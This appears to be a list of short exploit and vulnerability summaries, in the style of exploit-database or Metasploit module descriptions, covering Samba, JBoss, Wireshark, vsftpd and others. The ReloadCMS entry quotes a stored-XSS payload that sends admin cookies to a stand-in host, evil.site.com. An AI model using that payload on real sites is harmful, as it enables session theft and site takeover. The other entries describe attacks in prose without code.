The mpg123-0.59r program is vulnerable to a denial of service attack. When playing a specific evil song, the program crashes due to a SIGSEGV signal. The exact cause of the vulnerability is unknown and further investigation is required.
This module exploits a directory traversal vulnerability in Motorola's Timbuktu Pro for Windows 8.6.5.
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: 'Bug in the length checking for encrypted password change requests from clients.' The bug was discovered and reported by the Debian Samba Maintainers.
This module can be used to install a WAR file payload on JBoss servers that have an exposed 'jmx-console' application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method.
ReloadCMS does not properly sanitize the User-Agent request header before storing it in the stats.dat file. Example of an attack, through netcat: rgod>nc target.host.com 80 GET /path_to_reloadcms/ HTTP/1.0 User-Agent: "><script>window.open("http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL);window.close();</script> Host: target.host.com Connection: Close So, when the admin views the site statistics through the administration panel, the JavaScript will run. Once the grab.php script captures the admin cookie, the script itself can upload a shell through filemanager, launch commands and write output to a logfile. Also, inside the cookies, there is the admin MD5 password hash.
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small number of characters (4) to the command line on Windows.
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
This exploit allows an attacker to include local files on the target system.
The text describes two vulnerabilities in the MySms v1.0 application. The first vulnerability is an Authentication Bypass, which allows an attacker to bypass authentication by using a specific input. The second vulnerability is Cross-Site Request Forgery (CSRF), which allows an attacker to perform unauthorized actions on behalf of a user.
This is proof-of-concept code for exploiting the CVE-2011-0762 vulnerability in vsftpd. The vulnerability allows remote attackers to cause a denial of service (DoS) by sending a specially crafted command to the FTP server. The affected version is 2.3.2, and the fix is available in version 2.3.4.